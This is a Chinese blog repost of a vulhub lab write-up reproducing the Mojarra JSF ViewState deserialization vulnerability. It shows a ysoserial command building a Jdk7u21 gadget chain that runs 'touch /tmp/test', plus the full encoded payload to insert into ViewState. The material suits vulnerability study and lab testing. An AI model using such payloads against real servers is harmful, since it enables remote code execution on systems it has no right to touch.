IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> vulhub漏洞复现-Mojarra JSF ViewState 反序列化漏洞 -> 正文阅读

[Java知识库]vulhub漏洞复现-Mojarra JSF ViewState 反序列化漏洞

Mojarra JSF

JavaServer Faces (JSF)是一种用于构建 Web 应用程序的新标准 Java 框架,常见的同类型的框架,如Strut2,Yii(构建 Web 应用程序的php框架)等等等等。mojarra是JSF框架的一个实现一个产品

在这里插入图片描述

思路

在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行验证,所以我们可以在验证处按照对应加密规则放上我们想要执行的恶意命令

JSF中的ViewState也查不到,是用来验证,用来确保请求只发一次?
JSF中的ViewState

漏洞复现

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 "touch /tmp/test" | gzip | base64 -w 0

在这里插入图片描述

手动进行url编码
在这里插入图片描述

H4sIAAAAAAAAA61Wy28bRRj/xk5sxzjNo3n2mdKWPKC7zTvBEW0epDU4JMJpKuGDGa8n9rbr3e3ubLJBojf%2bAITKnQNwaDj0QqsekCpuLRckJFBRJbhwAw4VEhce3%2bxu4igJtVu60u7Mfq/5vm9%2b8823%2bSvU2xZ0XqFrVHK4qklpVb/KChepXcow/oP2/Ts3Hg0cCwG4FrRUpAL%2b3bkPbnx85/ZIGPnmegIAms%2bdB/GE0OqrilGWbEeXDKsoUZMqJSa5VKO6pOqcWTrVJNfWuCJxi7rSMiubGuXMTuHYcHnxnr55czgMkRQ05lS9wHT%2bllPOMysFB3KooNsa4ymku1mI5/IbnClGgdkcwtnsTBYiOUWjNv62ZtPCbRmXLcqzgpZMQ31Op2WGzB28DLdUvYjMlpzhcNPhS5ZhMourwmiHLyhilyv0pGuKWP/Bx7G8hd/8q7u9WPxxXCRM8EJID2VnNh93/hmJLf8UkCOf3P/77lfIHoLJOIThxSiMR%2bF0FF4i0GwzS6XaCrNs1dAvpeYIkDcINM4aus2pzleo5rD6L3o%2bevzho99fIxCZUnWV4yTc179CoG4Ws0CgCbeR%2bflapnkNKa1pQ0GzFI3jf0Cs4yXVJnAww538cpDTJbqhGbRAIJHSdWZ5KWMoNJresA3fOdn0ZWw/IRdooci4fWofK0kCDd5mrRpWmYDVl0ZMyIgJGTEh%2b5iQPUzIW5iQPUzIc4sLyey%2b0mWtIuv7o77HLDkTTCnHvF2kekFjVlKkJFYwFKeM%2bCFw5qmWR9WSbwfDn/n/zhCIv%2b4qzBQ0Owq9BD57unxU9aDAy/Lc8sK0q9opJFFuWNWVasqhGpgTOHgWLwhEg1wSmH4emcwYjqWweVXAOBEgUBKHNAFxeCEKfQSGnwGwBM7XuiOWo3O1zOTpvI0QV/iWJQJtXrFQjYrz3mmbrNXylqVttBA4XiUW3KIpRQtKQUulqr3tOxmFAcwZCgb/BNr7%2btN7xJIJeAXOxOFlkLCGcMNRSj0yL5sylmUeg7NYMZjLFAK9fXsr5057WCMVhqU2gSVuWNgbwRKW4VS5ukDNoPgcqYS0tI6VZmhkeGJ0aHxwcmhwbJLAsfST%2bEk4ASEsnegRvoegHiI4RkXJhZhHQxTgV9xJMo4Ex/qB20BueSKN%2bI14RAkO4DfhC0ATTOCIFRHaUEoon8M3LGi7FYc9xR6fGSiKWTt0eHwCndCFGt04930UZg8HZlMedR%2bz457ZAZ%2b5r9kjcBQ1xOwYHMflKwvEoH876FPIEVJNn0OYpO%2bA3Dr4JYxevuUpjnlBESHR461/AlpwjCMrBCehGRqca3AdbQH5bvuqOiyuqvYodEahKwrdtV5V135Rf5sqX%2bh6PldVeN4w9lxNp6teTahVS9E4ROBkDaYw9ArUF/NXmPLfh77awX0ijkntOE7uwnGrxz/ofdt27G6H2F2TQx2eKctcJ%2bDa73uYOCr8dyWsw9L2jV1pytytJlHELFlsVcOgJTzm7sbPvQ97vmmefRACkgZS4rgdlewEknJKX8NN3VnDXRNbxCHRHm5Zo7pucE9Gmt6e7lG8dP%2bPpvYH1z8NQSgNiTITwPGQhm1a0442DQsNNnN1fMPERq9lTxPoLb%2bro0WV%2bujDe193vPstHo15iIvtmsfSbmDX2cBLFrNLhlZwzaDJTazHRMsr0schtjpKR%2bnY2QlxcmLumlUlo1B5XNP9F3iIUkOJCwAA

进入后台查看
在这里插入图片描述

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-10-22 10:49:50  更:2021-10-22 10:51:46 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 22:31:29-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码